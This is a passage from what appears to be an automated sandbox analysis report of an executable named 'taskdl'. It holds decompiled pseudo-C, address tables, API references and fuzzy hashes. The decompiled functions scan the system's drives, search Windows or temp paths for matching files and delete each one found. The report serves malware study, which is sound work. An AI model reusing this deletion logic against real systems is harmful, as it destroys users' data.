				char _v1660;
				void* _v1664;
				void* _v1668;
				char _v1672;
				char _v1676;
				void* _v1680;
				char _v1681;
				void* _v1684;
				char _v1688;
				intOrPtr _v1696;
				intOrPtr _v1700;
				intOrPtr _v1704;
				intOrPtr _v1708;
				void* _t54;
				int _t57;
				intOrPtr _t62;
				intOrPtr _t64;
				WCHAR* _t65;
				char _t72;
				intOrPtr _t84;
				void* _t100;
				intOrPtr _t101;
				intOrPtr _t103;
				int _t105;
				void* _t106;
				intOrPtr _t107;
				intOrPtr _t108;
				intOrPtr _t110;
				void* _t112;
				intOrPtr _t113;
				intOrPtr _t115;
				void* _t118;

				_push(0xffffffff);
				_push(E00401AA7);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t115;
				_v1676 = _v1681;
				_v1672 = 0;
				_v1668 = 0;
				_v1664 = 0;
				_v4 = 0;
				_v1680 = 0;
				E00401000(_a4,  &_v1124);
				swprintf( &_v1644, 0x403040,  &_v1124, 0x403050);
				_t118 = _t115 - 0x688 + 0x18;
				_t54 = FindFirstFileW( &_v1644,  &(_v632.nFileSizeHigh)); // executed
				_t112 = _t54;
				if(_t112 != 0xffffffff) {
					_t72 = _v1681;
					do {
						swprintf( &_v1644, 0x403034,  &_v1124,  &_v560);
						_v1660 = _t72;
						__imp__?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z(0);
						_t57 = wcslen( &_v1648);
						_t118 = _t118 + 0x14;
						_t105 = _t57;
						__imp__?_Grow@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAE_NI_N@Z(_t105, 1);
						if(_t57 != 0) {
							E00401330(_v1668,  &_v1656, _t105);
							_t118 = _t118 + 0xc;
							__imp__?_Eos@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEXI@Z(_t105);
						}
						_v16 = 1;
						E004013D0( &_v1688);
						_v28 = 0;
						__imp__?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z(1, _v1680, 1,  &_v1672);
					} while (FindNextFileW(_t112,  &_v632) != 0);
					FindClose(_t112);
					_t100 = 0;
					_t106 = 0;
					while(1) {
						_t62 = _v1700;
						_t84 = _v1696;
						if(_t62 == 0 || _t100 >= _t84 - _t62 >> 4) {
							break;
						}
						_t65 =  *(_t106 + _t62 + 4);
						if(_t65 == 0) {
							_t65 = __imp__?_C@?1??_Nullstr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@CAPBGXZ@4GB;
						}
						if(DeleteFileW(_t65) != 0) {
							_v1708 = _v1708 + 1;
						}
						_t100 = _t100 + 1;
						_t106 = _t106 + 0x10;
					}
					_t101 = _t62;
					_t113 = _t84;
					_t107 = _t62;
					if(_t62 != _t84) {
						do {
							__imp__?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z(1);
							_t107 = _t107 + 0x10;
						} while (_t107 != _t113);
						_t62 = _v1704;
					}
					_v1696 = _t101;
					_v32 = 0xffffffff;
					_t108 = _t62;
					if(_t62 != _t101) {
						do {
							__imp__?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z(1);
							_t108 = _t108 + 0x10;
						} while (_t108 != _t101);
						_t62 = _v1704;
					}
					E004018D0(_t62, _t62);
					_t64 = _v1708;
				} else {
					_t103 = _v1668;
					_t110 = _v1672;
					_v4 = _t54;
					if(_t110 != _t103) {
						do {
							_t54 = E00401870(_t110, 0);
							_t110 = _t110 + 0x10;
						} while (_t110 != _t103);
						_t110 = _v1672;
					}
					E004018D0(_t54, _t110);
					_t64 = 0;
				}
				 *[fs:0x0] = _v40;
				return _t64;
			}














































                                                      0x00401080
                                                      0x00401082
                                                      0x0040108d
                                                      0x0040108e
                                                      0x004010a5
                                                      0x004010a9
                                                      0x004010ad
                                                      0x004010b1
                                                      0x004010c5
                                                      0x004010cc
                                                      0x004010d0
                                                      0x004010f5
                                                      0x004010f7
                                                      0x00401107
                                                      0x0040110d
                                                      0x00401112
                                                      0x0040114a
                                                      0x0040114e
                                                      0x00401168
                                                      0x00401171
                                                      0x00401177
                                                      0x00401182
                                                      0x00401188
                                                      0x0040118b
                                                      0x00401194
                                                      0x0040119c
                                                      0x004011a9
                                                      0x004011ae
                                                      0x004011b6
                                                      0x004011b6
                                                      0x004011cc
                                                      0x004011d4
                                                      0x004011df
                                                      0x004011e7
                                                      0x004011fc
                                                      0x00401205
                                                      0x00401211
                                                      0x00401213
                                                      0x00401215
                                                      0x00401215
                                                      0x00401219
                                                      0x0040121f
                                                      0x00000000
                                                      0x00000000
                                                      0x0040122c
                                                      0x00401232
                                                      0x00401234
                                                      0x00401234
                                                      0x0040123e
                                                      0x00401240
                                                      0x00401240
                                                      0x00401244
                                                      0x00401245
                                                      0x00401245
                                                      0x0040124c
                                                      0x0040124e
                                                      0x00401250
                                                      0x00401252
                                                      0x00401254
                                                      0x00401258
                                                      0x0040125e
                                                      0x00401261
                                                      0x00401265
                                                      0x00401265
                                                      0x0040126b
                                                      0x0040126f
                                                      0x0040127a
                                                      0x0040127c
                                                      0x0040127e
                                                      0x00401282
                                                      0x00401288
                                                      0x0040128b
                                                      0x0040128f
                                                      0x0040128f
                                                      0x00401294
                                                      0x00401299
                                                      0x00401114
                                                      0x00401114
                                                      0x00401118
                                                      0x0040111e
                                                      0x00401125
                                                      0x00401127
                                                      0x0040112a
                                                      0x0040112f
                                                      0x00401132
                                                      0x00401136
                                                      0x00401136
                                                      0x0040113b
                                                      0x00401143
                                                      0x00401143
                                                      0x004012ab
                                                      0x004012b8

                                                      APIs
                                                        • Part of subcall function 00401000: GetWindowsDirectoryW.KERNEL32(00000019,00000104,76E80F00,00000019,004010D5,?,?,76E80F00,00000019,76E83300,00000000), ref: 0040100C
                                                        • Part of subcall function 00401000: GetTempPathW.KERNEL32(00000104,00000019), ref: 00401028
                                                        • Part of subcall function 00401000: wcslen.MSVCRT ref: 00401035
                                                        • Part of subcall function 00401000: wcslen.MSVCRT ref: 0040103F
                                                        • Part of subcall function 00401000: wcslen.MSVCRT ref: 0040104D
                                                      • swprintf.MSVCRT(?,00403040,?,00403050,76E83300,00000000), ref: 004010F5
                                                      • FindFirstFileW.KERNELBASE(?,?), ref: 00401107
                                                      • swprintf.MSVCRT(?,00403034,?,?), ref: 00401168
                                                      • ?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z.MSVCP60(00000000), ref: 00401177
                                                      • wcslen.MSVCRT ref: 00401182
                                                      • ?_Grow@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAE_NI_N@Z.MSVCP60(00000000,00000001), ref: 00401194
                                                      • ?_Eos@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEXI@Z.MSVCP60(00000000), ref: 004011B6
                                                      • ?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z.MSVCP60(00000001), ref: 004011E7
                                                      • FindNextFileW.KERNEL32(00000000,?), ref: 004011F6
                                                      • FindClose.KERNEL32(00000000), ref: 00401205
                                                      • DeleteFileW.KERNEL32(?), ref: 0040123A
                                                      • ?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z.MSVCP60(00000001), ref: 00401258
                                                      • ?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z.MSVCP60(00000001), ref: 00401282
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.3015229018.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000A.00000002.3015183023.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 0000000A.00000002.3015270257.0000000000402000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 0000000A.00000002.3015310361.0000000000404000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_400000_taskdl.jbxd
                                                      Similarity
                                                      • API ID: G@2@@std@@G@std@@U?$char_traits@V?$allocator@$Tidy@?$basic_string@wcslen$FileFind$swprintf$CloseDeleteDirectoryEos@?$basic_string@FirstGrow@?$basic_string@NextPathTempWindows
                                                      • String ID:
                                                      • API String ID: 2889739147-0
                                                      • Opcode ID: d094fdb74faa2036a2288d1d3d1a61125983eed402f55e78df214a8260d1f803
                                                      • Instruction ID: c02e7cbfb6260119d7520a8cc5a4b78e5b9d8733a8a6b2d1cbf059c3021fc26b
                                                      • Opcode Fuzzy Hash: d094fdb74faa2036a2288d1d3d1a61125983eed402f55e78df214a8260d1f803
                                                      • Instruction Fuzzy Hash: E551C3716043419FD720DF64C884B9BB7E9FBC8348F044A2EF589B32D1D6789945CB5A
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 004018F6 Relevance: 16.6, APIs: 11, Instructions: 111COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      C-Code - Quality: 71%
                                                      			_entry_(void* __ebx, void* __edi, void* __esi) {
				CHAR* _v8;
				intOrPtr* _v24;
				intOrPtr _v28;
				struct _STARTUPINFOA _v96;
				int _v100;
				char** _v104;
				int _v108;
				void _v112;
				char** _v116;
				intOrPtr* _v120;
				intOrPtr _v124;
				void* _t27;
				intOrPtr _t36;
				signed int _t38;
				int _t40;
				intOrPtr* _t41;
				intOrPtr _t42;
				intOrPtr _t49;
				intOrPtr* _t55;
				intOrPtr _t58;

				_push(0xffffffff);
				_push(0x4020a8);
				_push(0x401a7c);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t58;
				_v28 = _t58 - 0x68;
				_v8 = 0;
				__set_app_type(2);
				 *0x403084 =  *0x403084 | 0xffffffff;
				 *0x403088 =  *0x403088 | 0xffffffff;
				 *(__p__fmode()) =  *0x403080;
				 *(__p__commode()) =  *0x40307c;
				 *0x40308c = _adjust_fdiv;
				_t27 = E00401A7B( *_adjust_fdiv);
				if( *0x403070 == 0) {
					__setusermatherr(E00401A78);
				}
				E00401A66(_t27);
				_push(0x40300c);
				_push(0x403008);
				L00401A60();
				_v112 =  *0x403078;
				__getmainargs( &_v100,  &_v116,  &_v104,  *0x403074,  &_v112);
				_push(0x403004);
				_push(0x403000);
				L00401A60();
				_t55 =  *_acmdln;
				_v120 = _t55;
				if( *_t55 != 0x22) {
					while( *_t55 > 0x20) {
						_t55 = _t55 + 1;
						_v120 = _t55;
					}
				} else {
					do {
						_t55 = _t55 + 1;
						_v120 = _t55;
						_t42 =  *_t55;
					} while (_t42 != 0 && _t42 != 0x22);
					if( *_t55 == 0x22) {
						L6:
						_t55 = _t55 + 1;
						_v120 = _t55;
					}
				}
				_t36 =  *_t55;
				if(_t36 != 0 && _t36 <= 0x20) {
					goto L6;
				}
				_v96.dwFlags = 0;
				GetStartupInfoA( &_v96);
				if((_v96.dwFlags & 0x00000001) == 0) {
					_t38 = 0xa;
				} else {
					_t38 = _v96.wShowWindow & 0x0000ffff;
				}
				_push(_t38);
				_push(_t55);
				_push(0);
				_push(GetModuleHandleA(0));
				_t40 = E004012C0();
				_v108 = _t40;
				exit(_t40); // executed
				_t41 = _v24;
				_t49 =  *((intOrPtr*)( *_t41));
				_v124 = _t49;
				_push(_t41);
				_push(_t49);
				L00401A5A();
				return _t41;
			}























                                                      0x004018f9
                                                      0x004018fb
                                                      0x00401900
                                                      0x0040190b
                                                      0x0040190c
                                                      0x00401919
                                                      0x0040191e
                                                      0x00401923
                                                      0x0040192a
                                                      0x00401931
                                                      0x00401944
                                                      0x00401952
                                                      0x0040195b
                                                      0x00401960
                                                      0x0040196b
                                                      0x00401972
                                                      0x00401978
                                                      0x00401979
                                                      0x0040197e
                                                      0x00401983
                                                      0x00401988
                                                      0x00401992
                                                      0x004019ab
                                                      0x004019b1
                                                      0x004019b6
                                                      0x004019bb
                                                      0x004019c8
                                                      0x004019ca
                                                      0x004019d0
                                                      0x00401a0c
                                                      0x00401a11
                                                      0x00401a12
                                                      0x00401a12
                                                      0x004019d2
                                                      0x004019d2
                                                      0x004019d2
                                                      0x004019d3
                                                      0x004019d6
                                                      0x004019d8
                                                      0x004019e3
                                                      0x004019e5
                                                      0x004019e5
                                                      0x004019e6
                                                      0x004019e6
                                                      0x004019e3
                                                      0x004019e9
                                                      0x004019ed
                                                      0x00000000
                                                      0x00000000
                                                      0x004019f3
                                                      0x004019fa
                                                      0x00401a04
                                                      0x00401a19
                                                      0x00401a06
                                                      0x00401a06
                                                      0x00401a06
                                                      0x00401a1a
                                                      0x00401a1b
                                                      0x00401a1c
                                                      0x00401a24
                                                      0x00401a25
                                                      0x00401a2a
                                                      0x00401a2e
                                                      0x00401a34
                                                      0x00401a39
                                                      0x00401a3b
                                                      0x00401a3e
                                                      0x00401a3f
                                                      0x00401a40
                                                      0x00401a47

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.3015229018.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000A.00000002.3015183023.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 0000000A.00000002.3015270257.0000000000402000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 0000000A.00000002.3015310361.0000000000404000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_400000_taskdl.jbxd
                                                      Similarity
                                                      • API ID: _initterm$FilterHandleInfoModuleStartupXcpt__getmainargs__p__commode__p__fmode__set_app_type__setusermatherrexit
                                                      • String ID:
                                                      • API String ID: 801014965-0
                                                      • Opcode ID: 4015c31cfa7eab49e8c51e62fd741af3e0d2f81cb378811d4cbcafae977c22e0
                                                      • Instruction ID: 68ab6ae738ded19f39d0610043d4fcd1ea5deb11ceedb7bb579f538117b6dbca
                                                      • Opcode Fuzzy Hash: 4015c31cfa7eab49e8c51e62fd741af3e0d2f81cb378811d4cbcafae977c22e0
                                                      • Instruction Fuzzy Hash: 42417EB5901344EFDB209FA4DA49A6ABFB8EB09715F20023FF581B72E1D6784940CF58
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 004012C0 Relevance: 4.5, APIs: 3, Instructions: 41sleepCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 58 4012c0-4012db GetLogicalDrives 59 4012e0-401303 58->59 60 401305-40130f GetDriveTypeW 59->60 61 40131e-401322 59->61 60->61 62 401311-40131c call 401080 Sleep 60->62 61->59 63 401324-40132d 61->63 62->61
                                                      C-Code - Quality: 100%
                                                      			E004012C0() {
				intOrPtr _v4;
				short _v8;
				unsigned int _t8;
				int _t13;
				unsigned int _t15;
				signed int _t21;
				short* _t23;

				_t23 =  &_v8;
				_t8 = GetLogicalDrives(); // executed
				_t15 = _t8;
				_t21 = 0x19;
				do {
					_v8 =  *0x403060;
					_v4 =  *0x403064;
					_t3 = _t21 + 0x41; // 0x5a
					_v8 = _t3;
					if((_t15 >> _t21 & 0x00000001) != 0) {
						_t13 = GetDriveTypeW( &_v8); // executed
						if(_t13 != 4) {
							E00401080(_t21);
							_t23 =  &(_t23[2]);
							Sleep(0xa); // executed
						}
					}
					_t21 = _t21 - 1;
				} while (_t21 >= 2);
				return 0;
			}










                                                      0x004012c0
                                                      0x004012c7
                                                      0x004012d9
                                                      0x004012db
                                                      0x004012e0
                                                      0x004012eb
                                                      0x004012ef
                                                      0x004012f9
                                                      0x004012fc
                                                      0x00401303
                                                      0x0040130a
                                                      0x0040130f
                                                      0x00401312
                                                      0x00401317
                                                      0x0040131c
                                                      0x0040131c
                                                      0x0040130f
                                                      0x0040131e
                                                      0x0040131f
                                                      0x0040132d

                                                      APIs
                                                      • GetLogicalDrives.KERNELBASE ref: 004012C7
                                                      • GetDriveTypeW.KERNELBASE(?,?,?,?,00000000,?,0000000A), ref: 0040130A
                                                        • Part of subcall function 00401080: swprintf.MSVCRT(?,00403040,?,00403050,76E83300,00000000), ref: 004010F5
                                                        • Part of subcall function 00401080: FindFirstFileW.KERNELBASE(?,?), ref: 00401107
                                                      • Sleep.KERNELBASE(0000000A,00000000,?,0000000A), ref: 0040131C
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.3015229018.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000A.00000002.3015183023.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 0000000A.00000002.3015270257.0000000000402000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 0000000A.00000002.3015310361.0000000000404000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_400000_taskdl.jbxd
                                                      Similarity
                                                      • API ID: DriveDrivesFileFindFirstLogicalSleepTypeswprintf
                                                      • String ID:
                                                      • API String ID: 570308627-0
                                                      • Opcode ID: fac8c12e3c7440fa081a6b1de2581f42964eb1eb3cef597a2f435b430f1423df
                                                      • Instruction ID: 4c7b1852939095ad3804a53ba97627e403d947e7219eb0394d6b0875d80bfcc1
                                                      • Opcode Fuzzy Hash: fac8c12e3c7440fa081a6b1de2581f42964eb1eb3cef597a2f435b430f1423df
                                                      • Instruction Fuzzy Hash: D9F0C8756043044BD310DF18ED4065B77A5EB99354F00053EED45B3390D776990DC6AA
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Non-executed Functions

                                                      Function 00401690 Relevance: 10.6, APIs: 7, Instructions: 139COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      APIs
                                                      • ?_Xran@std@@YAXXZ.MSVCP60(?,?,?,?,?,?,00401AD1,000000FF,00401609,?,?,77045320,00000000,00000000,?,?), ref: 004016EE
                                                      • ?_Split@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEXXZ.MSVCP60(?,?,?,?,?,?,00401AD1,000000FF,00401609,?,?,77045320,00000000,00000000,?,?), ref: 004016F6
                                                      • ?_Grow@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAE_NI_N@Z.MSVCP60(?,00000000), ref: 0040172D
                                                      • ?_Eos@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEXI@Z.MSVCP60(?), ref: 0040173A
                                                      • ?_Split@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEXXZ.MSVCP60 ref: 00401742
                                                      • ?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z.MSVCP60(00000001,?,?,?,?,?,?,00401AD1,000000FF,00401609,?,?,77045320,00000000,00000000,?), ref: 00401779
                                                      • ?_Grow@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAE_NI_N@Z.MSVCP60(?,00000001,?,?,?,?,?,?,00401AD1,000000FF,00401609,?,?,77045320,00000000,00000000), ref: 004017BA
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.3015229018.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000A.00000002.3015183023.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 0000000A.00000002.3015270257.0000000000402000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 0000000A.00000002.3015310361.0000000000404000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_400000_taskdl.jbxd
                                                      Similarity
                                                      • API ID: G@2@@std@@G@std@@U?$char_traits@V?$allocator@$Grow@?$basic_string@Split@?$basic_string@$Eos@?$basic_string@Tidy@?$basic_string@Xran@std@@
                                                      • String ID:
                                                      • API String ID: 2613176527-0
                                                      • Opcode ID: d8cc844e41db627e1c4436b7b7a073ec45db5ac64ec8fc819127fe6e53c62420
                                                      • Instruction ID: b735bfb2d4c14645f341b606901ad4f9af47e45cc28c7d2ea722b83d512bfbf9
                                                      • Opcode Fuzzy Hash: d8cc844e41db627e1c4436b7b7a073ec45db5ac64ec8fc819127fe6e53c62420
                                                      • Instruction Fuzzy Hash: 81410275300B008FC720DF19DAC4A6AB7E6FB89710B14897EE5569B7A0CB79AC01CB48
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00401000 Relevance: 9.0, APIs: 6, Instructions: 44COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 96 401000-401020 GetWindowsDirectoryW 97 401022-40103c GetTempPathW wcslen 96->97 98 40105e-401070 swprintf 96->98 99 401073-401077 97->99 100 40103e-40104a wcslen 97->100 98->99 100->99 101 40104c-40105d wcslen 100->101
                                                      C-Code - Quality: 100%
                                                      			E00401000(intOrPtr _a4, wchar_t* _a8) {
				wchar_t* _t11;
				wchar_t* _t22;

				_t22 = _a8;
				GetWindowsDirectoryW(_t22, 0x104);
				_t11 = _a4 + 0x41;
				if(0 != _t11) {
					swprintf(_t22, 0x403010, _t11, 0x403020);
					goto L5;
				} else {
					GetTempPathW(0x104, _t22);
					if(wcslen(_t22) <= 0 ||  *((short*)(_t22 + wcslen(_t22) * 2 - 2)) != 0x5c) {
						L5:
						return _t22;
					} else {
						 *((short*)(_t22 + wcslen(_t22) * 2 - 2)) = 0;
						return _t22;
					}
				}
			}





                                                      0x00401001
                                                      0x0040100c
                                                      0x0040101b
                                                      0x00401020
                                                      0x0040106a
                                                      0x00000000
                                                      0x00401022
                                                      0x00401028
                                                      0x0040103c
                                                      0x00401073
                                                      0x00401077
                                                      0x0040104c
                                                      0x00401052
                                                      0x0040105d
                                                      0x0040105d
                                                      0x0040103c

                                                      APIs
                                                      • GetWindowsDirectoryW.KERNEL32(00000019,00000104,76E80F00,00000019,004010D5,?,?,76E80F00,00000019,76E83300,00000000), ref: 0040100C
                                                      • GetTempPathW.KERNEL32(00000104,00000019), ref: 00401028
                                                      • wcslen.MSVCRT ref: 00401035
                                                      • wcslen.MSVCRT ref: 0040103F
                                                      • wcslen.MSVCRT ref: 0040104D
                                                      • swprintf.MSVCRT(00000019,00403010,?,00403020), ref: 0040106A
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.3015229018.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000A.00000002.3015183023.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 0000000A.00000002.3015270257.0000000000402000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 0000000A.00000002.3015310361.0000000000404000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_400000_taskdl.jbxd
                                                      Similarity
                                                      • API ID: wcslen$DirectoryPathTempWindowsswprintf
                                                      • String ID:
                                                      • API String ID: 30654359-0
                                                      • Opcode ID: 4e66369f8c42ca16cc11ceda3156b996b8b268552c228e5f165bda1afb4dc665
                                                      • Instruction ID: 00ede0775e497762771a1e7050bb3ecf99d0a0070f097ddb1d391ed7ba2ca3cf
                                                      • Opcode Fuzzy Hash: 4e66369f8c42ca16cc11ceda3156b996b8b268552c228e5f165bda1afb4dc665
                                                      • Instruction Fuzzy Hash: ADF0C87170122067E7206B2CBD0AE9F77A8EF85315B01403AF786B62D0D2B55A5586EE
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 004013D0 Relevance: 7.8, APIs: 5, Instructions: 264COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 102 4013d0-4013ec 103 4013f2-4013f7 102->103 104 40152b-401538 102->104 107 401404 103->107 108 4013f9-401402 103->108 105 4015e7-4015e9 104->105 106 40153e-40154e 104->106 109 401682-401689 105->109 110 4015ef-401600 105->110 111 401550 106->111 112 40157c-40158c 106->112 113 401406-401408 107->113 108->107 108->113 114 401602-401614 call 401690 110->114 115 40161e-401627 110->115 116 401554-401572 call 401690 111->116 119 4015a6-4015ad 112->119 120 40158e-40159c call 401690 112->120 117 40140a-40140c 113->117 118 40140e-401410 113->118 140 401616-40161a 114->140 125 401629-401645 ?assign@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@ABV12@II@Z 115->125 126 40164f-401656 115->126 141 401574-401578 116->141 127 401413-40141b 117->127 118->127 121 4015b3-4015cb ?assign@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@ABV12@II@Z 119->121 122 40167f 119->122 137 40159e-4015a2 120->137 121->121 129 4015cd-4015e4 121->129 122->109 125->125 132 401647-40164b 125->132 126->122 133 401658 126->133 134 40141d 127->134 135 40141f-40143e ??2@YAPAXI@Z 127->135 132->126 142 40165c-401675 ?assign@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@ABV12@II@Z 133->142 134->135 138 401440-401456 call 401690 135->138 139 401458-40145c 135->139 137->119 138->139 145 40147e-40148f 139->145 146 40145e 139->146 140->115 141->112 142->142 143 401677-40167b 142->143 143->122 149 401491 145->149 150 4014b5-4014bd 145->150 148 401462-40147c call 401690 146->148 148->145 152 401495-4014b3 call 401690 149->152 153 4014d0-4014f1 call 4018d0 150->153 154 4014bf-4014ce ?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z 150->154 152->150 160 4014f3-401509 153->160 161 40150c-401528 153->161 154->153 154->154
                                                      C-Code - Quality: 57%
                                                      			E004013D0(signed int __ecx) {
				signed int _t67;
				signed int _t68;
				signed int _t73;
				signed int _t77;
				signed int _t78;
				signed int _t79;
				intOrPtr _t81;
				intOrPtr _t91;
				intOrPtr _t95;
				intOrPtr _t98;
				signed int _t99;
				intOrPtr _t101;
				signed int _t104;
				intOrPtr _t105;
				signed int _t106;
				intOrPtr _t107;
				intOrPtr _t108;
				intOrPtr _t116;
				intOrPtr _t119;
				intOrPtr _t121;
				signed int _t127;
				intOrPtr _t135;
				signed int _t136;
				void* _t139;
				intOrPtr _t140;
				void* _t141;
				void* _t142;
				intOrPtr _t143;
				intOrPtr _t144;
				void* _t146;
				signed int _t147;
				intOrPtr _t148;
				signed int _t149;
				signed int _t151;
				intOrPtr _t152;
				signed int _t153;
				intOrPtr _t154;
				intOrPtr _t155;
				intOrPtr _t156;
				signed int _t157;
				intOrPtr _t158;
				signed int _t159;
				void* _t160;
				void* _t161;

				_t109 = __ecx;
				_t144 =  *((intOrPtr*)(__ecx + 8));
				_t136 =  *(_t160 + 0x24);
				_t67 =  *((intOrPtr*)(__ecx + 0xc)) - _t144 >> 4;
				 *(_t160 + 0x10) = __ecx;
				if(_t67 >= _t136) {
					_t104 =  *(_t160 + 0x20);
					if(_t144 - _t104 >> 4 >= _t136) {
						if(_t136 > 0) {
							_t68 = _t136 << 4;
							_t139 = _t144 - _t68;
							_t156 = _t144;
							 *(_t160 + 0x20) = _t68;
							if(_t139 == _t144) {
								L37:
								_t140 =  *((intOrPtr*)(_t109 + 8));
								_t146 = _t140 - _t68;
								if(_t104 == _t146) {
									L40:
									_t141 = _t68 + _t104;
									_t147 = _t104;
									if(_t104 == _t141) {
										goto L44;
									}
									_t105 =  *((intOrPtr*)(_t160 + 0x28));
									do {
										__imp__?assign@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@ABV12@II@Z(_t105, 0,  *__imp__?npos@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@2IB);
										_t147 = _t147 + 0x10;
									} while (_t147 != _t141);
									_t109 =  *(_t160 + 0x10);
									_t68 =  *(_t160 + 0x20);
									goto L44;
								} else {
									goto L38;
								}
								do {
									L38:
									_t146 = _t146 - 0x10;
									_t140 = _t140 - 0x10;
									__imp__?assign@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@ABV12@II@Z(_t146, 0,  *__imp__?npos@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@2IB);
								} while (_t146 != _t104);
								_t109 =  *(_t160 + 0x10);
								_t68 =  *(_t160 + 0x20);
								goto L40;
							} else {
								goto L35;
							}
							do {
								L35:
								E00401690(__ecx, _t156, _t139);
								_t139 = _t139 + 0x10;
								_t160 = _t160 + 8;
								_t156 = _t156 + 0x10;
							} while (_t139 != _t144);
							_t109 =  *(_t160 + 0x10);
							_t68 =  *(_t160 + 0x20);
							goto L37;
						}
						return _t67;
					} else {
						_t157 = _t104;
						_t68 = _t136 << 4;
						 *(_t160 + 0x20) = _t68;
						_t127 = _t68 + _t104;
						if(_t104 != _t144) {
							 *(_t160 + 0x24) = _t127;
							do {
								E00401690(_t109,  *(_t160 + 0x24), _t157);
								_t116 =  *((intOrPtr*)(_t160 + 0x2c));
								_t157 = _t157 + 0x10;
								_t160 = _t160 + 8;
								_t109 = _t116 + 0x10;
								 *(_t160 + 0x24) = _t116 + 0x10;
							} while (_t157 != _t144);
							_t68 =  *(_t160 + 0x20);
							_t109 =  *(_t160 + 0x10);
						}
						_t148 =  *((intOrPtr*)(_t109 + 8));
						_t158 =  *((intOrPtr*)(_t160 + 0x28));
						_t142 = _t136 - (_t148 - _t104 >> 4);
						if(_t142 != 0) {
							do {
								E00401690(_t109, _t148, _t158);
